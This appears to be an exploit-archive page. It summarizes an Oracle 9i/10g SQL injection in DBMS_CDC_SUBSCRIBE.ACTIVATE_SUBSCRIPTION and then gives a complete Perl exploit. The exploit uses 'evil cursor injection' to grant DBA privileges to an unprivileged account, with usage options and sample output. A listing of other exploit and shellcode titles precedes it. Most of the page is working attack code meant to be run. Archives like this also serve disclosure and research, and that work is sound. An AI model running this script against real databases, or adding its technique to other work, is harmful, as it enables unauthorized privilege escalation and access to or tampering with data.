880bbe402e
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
137 lines
No EOL
4.6 KiB
Perl
Executable file
137 lines
No EOL
4.6 KiB
Perl
Executable file
source: https://www.securityfocus.com/bid/13236/info
|
|
|
|
Oracle database is prone to an SQL-injection vulnerability because the software fails to properly sanitize user-supplied data. The 'SUBSCRIPTION_NAME' parameter is vulnerable.
|
|
|
|
Packages that employ this parameter execute with 'SYS' user privileges. Exploiting the SQL-injection vulnerability can allow an attacker to gain 'SYS' privileges.
|
|
|
|
The attacker can exploit this issue using malformed PL/SQL statements to pass unauthorized SQL statements to the database. A successful exploit could allow the attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
|
|
|
|
This issue was originally disclosed in the 'Oracle Critical Patch Update - April 2005' advisory. BID 13139 Oracle Multiple Vulnerabilities describes the issues covered in the Oracle advisory. There is insufficient information at this time to associate this vulnerability with an identifier from the Oracle advisory.
|
|
|
|
#!/usr/bin/perl
|
|
#
|
|
# Remote Oracle DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION exploit (9i/10g)
|
|
# - Version 2 - New "evil cursor injection" tip!
|
|
# - No "create procedure" privileg needed!
|
|
# - See: http://www.databasesecurity.com/ (Cursor Injection)
|
|
#
|
|
# Grant or revoke dba permission to unprivileged user
|
|
#
|
|
# Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0"
|
|
#
|
|
# REF: http://www.securityfocus.com/archive/1/396133
|
|
#
|
|
# AUTHOR: Andrea "bunker" Purificato
|
|
# http://rawlab.mindcreations.com
|
|
#
|
|
# DATE: Copyright 2007 - Mon Feb 26 12:13:19 CET 2007
|
|
#
|
|
# Oracle InstantClient (basic + sdk) required for DBD::Oracle
|
|
#
|
|
#
|
|
# bunker@fin:~$ perl dbms_cdc_subscribeV2.pl -h localhost -s test -u bunker -p **** -r
|
|
# [-] Wait...
|
|
# [-] Revoking DBA from BUNKER...
|
|
# DBD::Oracle::db do failed: ORA-01031: insufficient privileges (DBD ERROR: OCIStmtExecute) [for Statement "REVOKE DBA FROM BUNKER"] at dbms_cdc_subscribeV2.pl line 92.
|
|
# [-] Done!
|
|
#
|
|
# bunker@fin:~$ perl dbms_cdc_subscribeV2.pl -h localhost -s test -u bunker -p **** -g
|
|
# [-] Wait...
|
|
# [-] Creating evil cursor...
|
|
# Cursor: 2
|
|
# [-] Go ...(don't worry about errors)!
|
|
# DBD::Oracle::st execute failed: ORA-31425: subscription does not exist
|
|
# ORA-06512: at "SYS.DBMS_CDC_SUBSCRIBE", line 37
|
|
# ORA-06512: at line 3 (DBD ERROR: OCIStmtExecute) [for Statement "
|
|
# BEGIN
|
|
# SYS.DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION('''||dbms_sql.execute(2)||''');
|
|
# END;
|
|
# "] at dbms_cdc_subscribeV2.pl line 122.
|
|
# [-] YOU GOT THE POWAH!!
|
|
#
|
|
# bunker@fin:~$ perl dbms_cdc_subscribeV2.pl -h localhost -s test -u bunker -p **** -r
|
|
# [-] Wait...
|
|
# [-] Revoking DBA from BUNKER...
|
|
# [-] Done!
|
|
#
|
|
|
|
use warnings;
|
|
use strict;
|
|
use DBI;
|
|
use Getopt::Std;
|
|
use vars qw/ %opt /;
|
|
|
|
sub usage {
|
|
print <<"USAGE";
|
|
|
|
Syntax: $0 -h <host> -s <sid> -u <user> -p <passwd> -g|-r [-P <port>]
|
|
|
|
Options:
|
|
-h <host> target server address
|
|
-s <sid> target sid name
|
|
-u <user> user
|
|
-p <passwd> password
|
|
|
|
-g|-r (g)rant dba to user | (r)evoke dba from user
|
|
[-P <port> Oracle port]
|
|
|
|
USAGE
|
|
exit 0
|
|
}
|
|
|
|
my $opt_string = 'h:s:u:p:grP:';
|
|
getopts($opt_string, \%opt) or &usage;
|
|
&usage if ( !$opt{h} or !$opt{s} or !$opt{u} or !$opt{p} );
|
|
&usage if ( !$opt{g} and !$opt{r} );
|
|
my $user = uc $opt{u};
|
|
|
|
my $dbh = undef;
|
|
if ($opt{P}) {
|
|
$dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s};port=$opt{P}", $opt{u}, $opt{p}) or die;
|
|
} else {
|
|
$dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s}", $opt{u}, $opt{p}) or die;
|
|
}
|
|
|
|
my $sqlcmd = "GRANT DBA TO $user";
|
|
print "[-] Wait...\n";
|
|
$dbh->func( 1000000, 'dbms_output_enable' );
|
|
|
|
|
|
if ($opt{r}) {
|
|
print "[-] Revoking DBA from $user...\n";
|
|
$sqlcmd = "REVOKE DBA FROM $user";
|
|
$dbh->do( $sqlcmd );
|
|
print "[-] Done!\n";
|
|
$dbh->disconnect;
|
|
exit;
|
|
}
|
|
|
|
print "[-] Creating evil cursor...\n";
|
|
my $sth = $dbh->prepare(qq{
|
|
DECLARE
|
|
MYC NUMBER;
|
|
BEGIN
|
|
MYC := DBMS_SQL.OPEN_CURSOR;
|
|
DBMS_SQL.PARSE(MYC,'declare pragma autonomous_transaction; begin execute immediate ''$sqlcmd'';commit;end;',0);
|
|
DBMS_OUTPUT.PUT_LINE('Cursor: '||MYC);
|
|
END;
|
|
} );
|
|
$sth->execute;
|
|
my $cursor = undef;
|
|
while (my $line = $dbh->func( 'dbms_output_get' )) {
|
|
print "$line\n";
|
|
if ($line =~ /^Cursor: (\d)/) {$cursor = $1;}
|
|
}
|
|
$sth->finish;
|
|
|
|
print "[-] Go ...(don't worry about errors)!\n";
|
|
$sth = $dbh->prepare(qq{
|
|
BEGIN
|
|
SYS.DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION('''||dbms_sql.execute($cursor)||''');
|
|
END;
|
|
});
|
|
$sth->execute;
|
|
$sth->finish;
|
|
print "[-] YOU GOT THE POWAH!!\n";
|
|
$dbh->disconnect;
|
|
exit; |